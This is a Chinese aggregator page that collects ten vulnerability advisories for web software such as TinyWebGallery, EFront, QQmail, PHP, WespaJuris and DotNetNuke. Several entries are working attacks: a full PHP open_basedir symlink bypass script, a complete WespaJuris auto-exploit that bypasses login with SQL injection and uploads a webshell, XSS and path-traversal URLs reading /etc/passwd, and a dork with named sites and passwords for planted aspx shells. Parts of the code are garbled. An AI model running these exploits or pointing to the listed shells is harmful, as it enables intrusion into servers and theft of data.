“圆圆成长指南”通过精心收集,向本站投稿了10篇TinyWebGallery 1.8.3版多个安全漏洞漏洞预警,下面小编为大家整理后的TinyWebGallery 1.8.3版多个安全漏洞漏洞预警,欢迎阅读与借鉴!
篇1:ServU多个安全漏洞漏洞预警
受影响系统:
serv-u serv-u 15.x
描述:
--------------------------------------------------------------------------------
Serv-U是一种使用广泛的FTP服务器程序,
Serv-U 15.1.0.458之前版本没有验证用户名称时会返回不同的响应,这可导致枚举有效的用户名称,某些用户输入没有正确过滤即返回给用户,这可导致在用户浏览器会话中执行任意HTML和脚本代码,
链接:secunia.com/advisories/58991/
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
serv-u
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.serv-u.com/releasenotes/
篇2:TinyWebGallery 1.8.3版多个安全漏洞漏洞预警
TinyWebGallery是一款php相册程序,TinyWebGallery 1.8.3中包含多个安全漏洞,包括目录遍历和XSS,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
Script. TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: www.tinywebgallery.com
[+]poc:
~~~~~~~~~
localhost/twg183/admin/index.php?sview=“onmouseover=alert(String.fromCharCode(88,83,83));”
localhost/twg183/admin/index.php?tview=“onmouseover=alert(String.fromCharCode(88,83,83));”
localhost/twg183/admin/index.php?dir=
localhost/twg183/admin/index.php?action=chmod&item=
localhost/twg183/twg183/admin/index.php?action=chmod&item=“>
localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16090
篇3:Nginx 安全漏洞 (CVE4547)漏洞预警
Nginx 的安全限制可能会被某些请求给忽略,当我们通过例如下列方式进行 URL 访问限制的时候,如果攻击者使用一些没经过转义的空格字符(无效的 HTTP 协议,但从 Nginx 0.8.41 开始因为考虑兼容性的问题予以支持)那么这个限制可能无效:
location /protected/ {
deny all;
}
当请求的是 “/foo /../protected/file” 这样的 URL (静态文件,但 foo 后面有一个空格结尾) 或者是如下的配置:
location ~ \.php$ {
fastcgi_pass …
}
当我们请求 “/file \0.php” 时就会绕过限制,
Nginx 安全漏洞 (CVE20134547)漏洞预警
,
该问题影响 nginx 0.8.41 – 1.5.6.
该问题已经在 Nginx 1.5.7 和 1.4.4 版本中修复。
补丁程序在:
nginx.org/download/patch.2013.space.txt
配置上临时的解决办法是:
if ($request_uri ~ ” “) {
return 444;
}
篇4:EFront 3.6.9 社区版多个漏洞漏洞预警
# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
# Google Dork: ”eFront (version 3.6.9)“ inurl:index.php?ctg=*
# Date: 5/09/
# Public release: When 3.6.10 will be released
# Author: IHTeam
# Software Link:www.efrontlearning.net/download/download-efront.html
# Tested on: efront_3.6.9_build11018
# Original Advisory:iht.li/FWh
# Advisory code:iht.li/p/0VV
Default username and password:
student:student
professor:professor
How to become admin:
Request 1: /change_account.php?login=admin
Request 2: /userpage.php
OR
simple use the [Switch account] option on top of the page;
Now you are in admin area;
SQL Injection:
www/student.php?ctg=messages&folder=
www/professor.php?ctg=messages&folder=
www/admin.php?ctg=messages&folder=
篇5:腾讯多个unfixed bugs漏洞预警
By Superhei
Sunday, April 24, 2011
一、邪恶的filterflag
关于filterflag的问题最早报告在4月的《QQmail Multiple Xss Vulnerabilities》一文里,但是直到今天该问题没有彻底得到解决,多个功能都可以触发,最直接的功能就是“打印”功能:
m353.mail.qq.com/cgi-bin/readmail?sid=[xxx]&t=readmail_print&s=print&filterflag=true&mailid=[xxx]
默认直接引入filterflag=true,当被攻击者使用此功能时,就可能直接被xss攻击。我们在看看“读邮件”功能,通过上次报告的腾讯“修补”的方式其实只是同过引入一个iframe打开,通过分析访问的url可以得到真正的读邮件功能的url:
m353.mail.qq.com/cgi-bin/readmail?folderid=1&t=readmail&mailid=[xxx]&mode=pre&maxage=3600&base=12&ver=1&sid=[xxx]&newwin=true&nocheckframe=true
我们附加filterflag=true后成功触发xss。 对于实际利用来说,mailid和sid都是随着登录而变化的,那么我们怎么得到它们呢? 通过上面的url可以看出mailid和sid都是get提交的变量,那么当我们引入第三方内容的时候通过取HTTP_REFERER可以得到当前邮件的url,当然包括了mailid和sid了!:)
poc设计如下:
邮件1的代码:
第三方内容[mail.php]:
提取HTTP_REFERER[即邮件1的url]后,注入filterflag=true后发送 邮件2
邮件2的代码:
test
攻击者访问邮件2后点击test的link,访问设置了filterflag=true的邮件1,导致我们
这个利用过程我称其为《回旋镖》
补丁建议:
A、这个开关的设计无非所怕过滤系统影响业务,不知道官方同学有没有跳查过真正对业务有多大的影响,必要是取消这个开关。[这又是一个安全于业务的话题!!]
B、如果这个开关必不可少的话,建议所用cookie/session等提交。
C、在需要filterflag=true的时候使用验证码,并提示用户保证邮件内容安全。
D、禁止在get方式提交敏感数据[sid/mailid]
二、悲剧的json
最早报告json导致的xss问题可以追溯到去年的2月我写过一篇blog《不要忘记数据本身的解析》当时的demo就是用的qun.qq.com上多个json导致的xss。后来我在今年的mhtml和utf7 bom导致的json里的xss问题。
现在我们在看看最开始提到的demo里的xss,到本文为止xss依旧!!!!
补丁建议:
引用blog《about utf7-BOM string injection》
--------------------------------
那么解决这个问题的方案有2点:
1. 严格控制数据文件,返回的Content-Type。
2. 数据存储时,使用编码。
当时甲方的朋友们看到json里直接插入html标签进行xss后,都基本所用了“2. 数据存储时,使用编码”了,而且没有去限制“Content-Type”,基本很在继续的“text/html”,这个也为这次的utf7-BOM string injection埋下了罪恶种子,如果这次再不修改Content-Type,我想有可能种子还有机会发芽开花!! :) 我想如果上面的2点方案同时用上,应该是一个不错的选择。
-------------------------------
三、没完没了的
就qqmail来说对于embed标签出现的安全问题从来就没有消停过,最早的qqmail大概所前可以直接通过:
来xss的。到里20《QQmail Multiple Xss Vulnerabilities》里需要使用相对路径了:
当时可以通过上传文件来调用...后来不知道什么时候限制了几个安全属性,设置了allownetworking=”internal“ allowscriptaccess=”never“
不过在今年4月根据Gareth Heyes发现的webkit下的code属性可以调用flash:
再一次成功xss,很块这个也被fixed了,不过在与此同时我发现了qqmail的另外一个缺陷[我同样也通知了官方的朋友,但是到本文为止未修补]:在处理embed标签时没有指定type属性,那么我们在webkit下可嵌入html代码[相当于iframe],
对于利用先不说挂webkit的0day,貌似这个不可以直接在qqmail域执行js。:(
我们跳到文章前面第一节里的“回旋镖”,当时邮件2利用的这个需要点击,如果我们直接利用embed嵌入呢? :)
补丁建议:
严格按照安全所用embed的安全规范走,规定type属性。
四、附件之疼
qqmail对于html附件一直防御比较严格的,就我发现的前后报告了2次的utf7的xss,第一次不记得是什么时候里当时用
然而就在前几天又发现一个问题。qqmail在处理html附件时直接有显示“打开”功能,这个打开的网页肯定是做了安全过滤的,但是对于非html后缀的文件呢?
进过测试发现html附件“打开”的url为:
m480.mail.qq.com/cgi-bin/download?mailid=[xxx]&filename=pp.txt.htm&sid=[xxx]&action=view&func=inline
对应的附件“下载”url为:
m480.mail.qq.com/cgi-bin/download?mailid=[xxx]&filename=pp.txt.htm&sid=[xxx]
很显然url附加&action=view&func=inline就可以了....
于是我们添加附件名为非html后缀的文件:
m396.mail.qq.com/cgi-bin/download?mailid=[xxx]&filename=mime.rar&sid=[xxx]
用ie访问m396.mail.qq.com/cgi-bin/download?mailid=[xxx]&filename=mime.rar&sid=[xxx]&action=view&func=inline 成功xss。
实际利用一样要得到mailid和sid,如法炮制《回旋镖》:)
补丁建议:
对于附件问题来说在《QQmail Multiple Xss Vulnerabilities》问及《我在qqmail上放了*个后门》文里提到的保证”代码与数据分离是安全设计的重要原则“ 也就是附件与mail的域完全分离...
五、微博的csrf
在去年的时候报告了2个 的csrf漏洞。微博防御csrf的方式之是判断了HTTP_REFERER,那么我们只要绕过对HTTP_REFERER的判断或者通过as/js等可以自定义HTTP_REFERER的方法就可以进行csrf攻击了.
首先说一下已经补丁了的非常经典的漏洞:
设置子域名t.qq.com.80vul.com 直接写个提交的html,就可以成功csrf了。这个漏洞在报告后其实也没有马上fix的,多次建议他们才修补!! 这个属于对referer处理的正则逻辑漏洞。
另外一个是PZ牛发现的一个firefox+flash可以伪造HTTP_REFERER的漏洞:
不过这个漏洞不在适用于firefox4.0,对于这样的浏览器的问题貌似应用方很无辜?根据我以前的blog文《web app安全的独立性》你还这样认为吗?另外今年的mhtml和utf7 bom导致的安全问题一样的道理。
补丁建议:
1、对于csrf的攻防在目前来是比较成熟的。建议增加token等机制。
2、重视《web app安全的独立性》
六、crossdomain.xml
早在n年前我就报告了qun.qq.com/crossdomain.xml的设置问题,直到前不久才设置为:
之前都是悲剧的,至于这样的后果这里就不谈了,我们在随便看看其他的子域名:
yc.qq.com/crossdomain.xml
ent.qq.com/crossdomain.xml
...
都还是domain=”*“
至于其他的基本都是domain=”*.qq.com“ domain=”*.soso.com“等,这样对于腾讯这样的庞大的子域名系统,找一个可以上传文件的子域名就可能突破。
补丁建议:
a、审计业务的需求,应该把握crossdomain.xml的设置,如没有必要这个xml都可以删除。
b、保证”代码与数据分离是安全设计的重要原则“[可以上传文件等的独立域名体系]
七、其他
比如国内各大公司还没有重视的json-hijecking、Clickjacking、FPI、子域名外包网站等问题。
小结
上面一些漏洞都是报告过但是没有得到完美处理的问题。这和这些漏洞本身的特点有关系,大多属于框架整体、业务功能本事的特点以及标准化的安全规范上的问题,所以只有从这些方面去着手才有可能从根本上解决问题。上面提到的那些漏洞就包括以下的一些原则或规范:
1、 《代码与数据分离是安全设计的重要原则》by 刺
2、 《web app安全的独立性》
3、 《不要忘记数据本身的解析》
4、 《Flash应用安全规范》 by jianxin
5、 确保好敏感数据的安全
从上面一些问题可以看出来腾讯很多漏洞都是从诞生来就埋下的隐患,而且在实际的安全推动过程缺少对应的规范原则,或者缺少执行力……
抛弃“见洞补漏”的刀耕火种的原始方式吧!
篇6:PHP 5.2.11/5.3.0 的多个漏洞漏洞预警
/*
PHP 5.2.11/5.3.0 symlink open_basedir bypass
by Maksymilian Arciemowicz securityreason.com/
cxib [ a.T] securityreason [ d0t] com
CHUJWAMWMUZG
*/
$fakedir=”cx“;
$fakedep=16;
$num=0; // offset of symlink.$num
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file=”“;
echo '
src=”
This'>securityreason.com/gfx/logo.gif?cx5211.php“>
This is exploit
from
href=”securityreason.com/“ title=”Security Audit PHP“>Security Audit
Lab - SecurityReason labs.
Author : Maksymilian Arciemowicz
Script. for legal use only.
PHP 5.2.11 5.3.0 symlink open_basedir bypass
More: SecurityReason
action=”'.$_SERVER[“HTTP_HOST”].htmlspecialchars($_SERVER[“PHP_SELF
”]).'“ method=”post“>
value=”'.htmlspecialchars($file).'“>
value=”Create Symlink“>';
if(empty($file))
exit;
if(!is_writable(”.“))
die(”not writable directory“);
$level=0;
for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as--) chdir(”..“);
$hardstyle. = explode(”/“, $file);
for($a=0;$a
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir(”..“);
@rmdir(”fakesymlink“);
@unlink(”fakesymlink“);
@symlink(str_repeat($fakedir.”/“,$fakedep),”fakesymlink“);
// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink(”fakesymlink/“.str_repeat(”../“,$fakedep-1).$file,
”symlink“.$num))) break;
else $num++;
@unlink(”fakesymlink“);
mkdir(”fakesymlink“);
die('check symlink
href=”./symlink'.$num.'“>symlink'.$num.' file');
?>
篇7:WespaJuris = 3.0多个缺陷及修复漏洞预警
/*
#标题spaJuris <= 3.0 auto exploit
# 网站: www.wespadigital.com.br/
# 下载地址 www.wespadigital.com.br/download/wespajuris_v3_0_.rar
# 影响版本: 3.0
# 测试平台: Apache Server
WespaJuris is a software for law firms.
Use this exploit to upload a webshell on vulnerable applications.
Usage:
php exploit.php
示例
$ php exploit.php
WespaJuris <= 3.0 exploit
Coded by WhiteCollarGroup
Type Ctrl + C for exit
Try ”php exploit.php /about“ for get info
[?] Target address (login form):
www.xxx.com/juris/
[?] Webshell path (in your computer):
C:\wamp\www\webshell.php
[*] Login...
[*] Trying to add php on allowed file formats.
[*] Adding a new client.
[*] Getting new client ID
[!] Client ID: 30
[*] Adding a new process.
[*] Getting new process ID.
[!] New process ID: 37
[*] Adding new task.
[*] Getting new task ID
[*] New task ID: 16
[*] Adding new doc type.
[*] Trying to get new doc type ID.
[!] New doc type ID: 7
[*] Trying to upload file...
[*] Thinking about file address...
[!] Exploit complete.
[i] You have now a webshell in
Then, go to localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
:: How this exploit works? Manually work.
~>Login bypass
On login form, enter ”SQLi strings“:
Login: ' or 1=1-- wc
Pass: wcgroup
~>Configure file formats
Go to ”CONFIGURAÇÕES“.
In ”Extensões de documentos“, add ”php“.
BEGIN Do it only if the system is blank
~>Add new client
Go to ”CLIENTES E USUÁRIOS“ >”adicionar“.
Add your own user.
~>Add new process
Go to ”PROCESSOS“ >”adicionar“.
Add your own process.
~>Add new task
Go to ”PROCESSOS“.
Click on the process that you've created.
In ”Tarefas“, click ”Adicionar“.
~>Add new document type
Go to ”DOCUMENTOS“.
Click ”ADICIONAR/EDITAR TIPO DOCUMENTO“.
In ”Adicionar Tipo de Documento“ form, type anything and then, click ”Adicionar“.
END Do it only if the system is blank
~>Get arbitrary file upload
Go to ”DOCUMENTOS“.
Click ”ADICIONAR DOCUMENTO“.
In ”Título“, select a client and a process. Click ”PROSSEGUIR“.
Select a task in ”TAREFAS“, a document type in ”Escolha um Tipo“.
In ”Título do documento“, type anything.
Upload file in ”Subir arquivo do Documento“. Leaves ”Link para Documento na Internet“ empty.
Click ”Adicionar Novo Documento“.
Click ”DOCUMENTOS“ and click on the your webshell.
*/
set_time_limit(0);
echo ”WespaJuris <= 3.0 auto exploit\n“;
echo ”Coded by WhiteCollarGroup\n“;
echo ”Type Ctrl + C for exit\n“;
if((isset($argv[1])) AND ($argv[1]==”/about“)) {
echo ”WhiteCollarGroup\www.xxx.com \nwhitecollar_group@hotmail.com\nTwitter/Facebook/Blogspot: WCollarGroup\nirc.virtualife.com.br #wcgroup\n\n“;
exit;
} else {
echo ”Try \“php $argv[0] /about\” for get info\n“;
}
echo ”\n“;
if(!function_exists(”curl_init“)) {
echo ”PHP CURL was not found on this system.\n“;
echo ”Linux(Debian-like apt system): Type the following command on shell:\n“;
echo ”# apt-get install php5-curl\n\n“;
echo ”Unix: Edit your file php.ini and remove \“;\” from following line:\n“;
echo ”;extension=curl.so\n\n“;
echo ”Windows: Edit your file php.ini and remove \“;\” from following line:\n“;
echo ”;extension=php_curl.dll\n\n“;
echo ”Read more: www.php.net/manual/book.curl.php\n\n“;
exit;
}
puts(”Target address (login form):“, ”[?]“);
$target = trim(fgets(STDIN));
$target = preg_replace(”/index\.php$/“, null, $target);
$target = preg_replace(”/\/$/“, null, $target);
puts(”Webshell path (in your computer):“, ”[?]“);
do {
$webshell = trim(fgets(STDIN));
if(!file_exists($webshell)) echo ”File not found!“;
} while(!file_exists($webshell));
$ch = curl_init();
// login
puts(”Login...“);
curl_setopt($ch, CURLOPT_URL, $target.”/process_login.php“);
curl_setopt($ch, CURLOPT_REFERER, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”do=login&username=“.urlencode(”' or 1=1-- wc“).”&password=wcgroup“);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, ”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/0725 Firefox/2.0.0.6“);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_COOKIEJAR, ”wcgroup.txt“);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec($ch);
if(preg_match(”/Dadosde acesso incorretos, por favor tente novamente/“, $store)) {
puts(”Could not login.“, ”[-]“);
echo ”Make sure that the server uses a vulnerable version of WespaJuris.\n“;
exit;
}
// config file format
$ext = end(explode(”.“, $webshell));
puts(”Trying to add $ext on allowed file formats.“);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=settings“);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”task=defsideset&new_serverdiff=0&new_dateformat=“.urlencode(”%Y/%c/%e“).”&new_extensions=“.urlencode(”$ext,php,jpg,jpeg,gif,png,psd,zip,ai,pdf,doc“));
curl_exec($ch);
// add client
puts(”Adding a new client.“);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=addclient“);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”task=addclient&company=WhiteCollarGroup&address1=www.wcgroup.host56.com&address2=whitecollar_group%40hotmail.com&city=%40WCollarGroup&state=facebook.com%2FWCollarGroup&zip=wcollargroup.blogspot.com&country=irc.virtualife.com.br+%23wcgroup&phone=WCGroup&phone_alt=This+was+a+auto+exploit&fax=We+did+not+hack+your+website“);
curl_exec($ch);
// get user ID
puts(”Getting new client ID“);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=addfiles“);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(”/WhiteCollarGroup<\/option>/“, $store, $numbers);
$uid = $numbers[1][0];
puts(”Client ID: $uid“, ”[!]“);
// add process
puts(”Adding a new process.“);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=addproj“);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”task=addproject&client_id=“.$uid.”&project_title=HackMySite&description=WCGroup+did+not+hacked+your+website.%0D%0AWCGroup+only+wrote+the+exploit+for+this+CMS+and+did+public+release.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&cost=0.00&status=Arquivado“);
$store = curl_exec($ch);
// get process ID
puts(”Getting new process ID.“);
$numbers = array();
preg_match_all(”/main\.php\?pg=projperms&pid=([0-9]*)/“, $store, $numbers);
$pid = $numbers[1][0];
puts(”New process ID: $pid“, ”[!]“);
// add task
puts(”Adding new task.“);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=addtask“);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”task=addtask&clid=$uid&pid=$pid&client_id=main.php%3Fpg%3Daddtask%26clid%3D$uid&pid=$pid&task_title=Hacked+site&description=Sorry%2C+admin.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&status=Em+andamento¬es=Check+www.wcgroup.host56.com+for+details&tuid=0“);
$store = curl_exec($ch);
// get task id
puts(”Getting new task ID“);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=proj&clid=$uid&pid=$pid“);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(”/main\.php\?pg=edittask&clid=$uid&pid=$pid&tid=([0-9]*)/“, $store, $numbers);
$taskid = $numbers[1][0];
puts(”New task ID: $taskid“);
// add doc type
puts(”Adding new doc type.“);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=filetypes“);
curl_setopt($ch, CURLOPT_POSTFIELDS, ”task=addfiletype&file_type=hack“);
curl_exec($ch);
// get doc type id
puts(”Trying to get new doc type ID.“);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.”/admin/main.php?pg=filetypes“);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(”/main\.php\?pg=filetypes&task=deltype&type_id=([0-9]*)/“, $store, $numbers);
$tid = $numbers[1][0];
puts(”New doc type ID: $tid“, ”[!]“);
// upload file
puts(”Trying to upload file...“);
curl_setopt($ch, CURLOPT_POST, 1);
$post = array(
”task“ =>”addfile“,
”client_id“ =>$uid,
”from“ =>”step1“,
”project_id“ =>$pid,
”clid“ =>$uid,
”task_id“ =>$taskid,
”type_id“ =>$tid,
”file_title“ =>”wcgroup“,
”file“ =>”@$webshell“
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);
// make file address
puts(”Thinking about file address...“);
$fileaddr = $target.”/clientdir/$uid/dl/“.basename($webshell);
puts(”Exploit complete.“, ”[!]“);
puts(”You have now a webshell in <$fileaddr>“, ”[i]“);
function puts($str, 0=false) {
if(!0) 0 = ”[*]“;
echo 0.” “.$str.”\n“;
}
篇8:PHPDug CSRF/XSS等多个漏洞漏洞预警
漏洞说明:PHPDug 2.0.0存在跨站请求伪造漏洞(CSRF)及XSS跨站漏洞,成功利用此漏洞可能导致应用程序的一个妥协,基于cookie的认证证书,泄露或窃取敏感数据的修改,
CSRF漏洞:由于该漏洞存在于“admin/ admin_edit.php”脚本没有正确验证的HTTP请求的来源。以下测试poc:
XSS跨站漏洞:由于该漏洞存在于“add_story.php”,“editprofile.php”,“admin/ content_add.php”,“admin/ admin_edit.php”。以下测试poc:
1.
'
>
2.
'>
3.
'>
4.
篇9:DotNetNuke多个0day缺陷及修复漏洞预警
受影响版本:DotNetNuke 5.x
其他版本可能也存在该问题
[+] Application: DotNetNuke
[+] Affected Version: version prior to 5.x
[+] Vendor’s URL: www.dotnetnuke.com/
[+] Bug Type: Privilege escalation, Unauthorized access, Remote
[+] Risk Level: High
[+] No-exploit is required to make it easier than what it is..
[+] DotNetNuke Remote File Upload Vulnerability
[+] Add/User Account Security Failer Vulnerability
[+] Unauthorized Full access to the Server! :)
[+] Unauthorized Full access to the Files and Database!
[+] It Could Be Failure to revalidate file and folder permissions correctly for uploads.
[-*-] Quick Note:
[-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective speard your shit
And hunte more idiots and root their machines! then hit them in the middle of no where by Saying
“Ph33r”
Access the upload panel Just dork:“inurl:ajaxfbs/browser.html”
Demo:
[1] www.badguest.cn/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.badguest.cn/aspx.aspx
Password: admin
[2] www.badguest.cn/DesktopModules/FlashSlide/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.badguest.cn/aspx.aspx
Password: admin
[3] www.badguest.cn/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.2cto.com/aspx.aspx
Password: admin
修复:
[*_*] The thanx belongs to the masters! Islamic Ghosts Team :)
篇10:AltN WebAdmin多个安全漏洞
转自:绿盟科技
发布日期:2005-01-28
更新日期:2005-01-31
受影响系统:
Alt-N WebAdmin 3.0.2
不受影响系统:
Alt-N WebAdmin 3.0.4
描述:
--------------------------------------------------------------------------------
WebAdmin是Alt-N技术公司开发的管理MDaemon、RelayFax和WorldClient的WEB应用程序,
Alt-N WebAdmin存在多个安全问题,远程攻击者可以利用这些漏洞进行跨站脚本,编辑用户帐户等攻击。
1、跨站脚本问题:
useredit_account.wdm没有正确过滤用户提交的URL数据,提交恶意脚本代码作为参数数据,可获得目标用户敏感信息:
server/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
2、用户可编辑所有用户帐户
useredit_account.wdm脚本对对其他帐户的访问没有任何验证,可提交如下URL请求编辑其他用户帐户信息:
server/WebAdmin/useredit_account.wdm?user=otheruser@domain
3、HTML注入
文件modalfram.wdm允许装载任意WEB页,可使用户盲目信任页面内容,
链接:marc.theaimsgroup.com/?l=bugtraq&m=110692897003614&w=2
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Alt-N
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.altn.com/products/default.asp?product%5Fid=WebAdmin
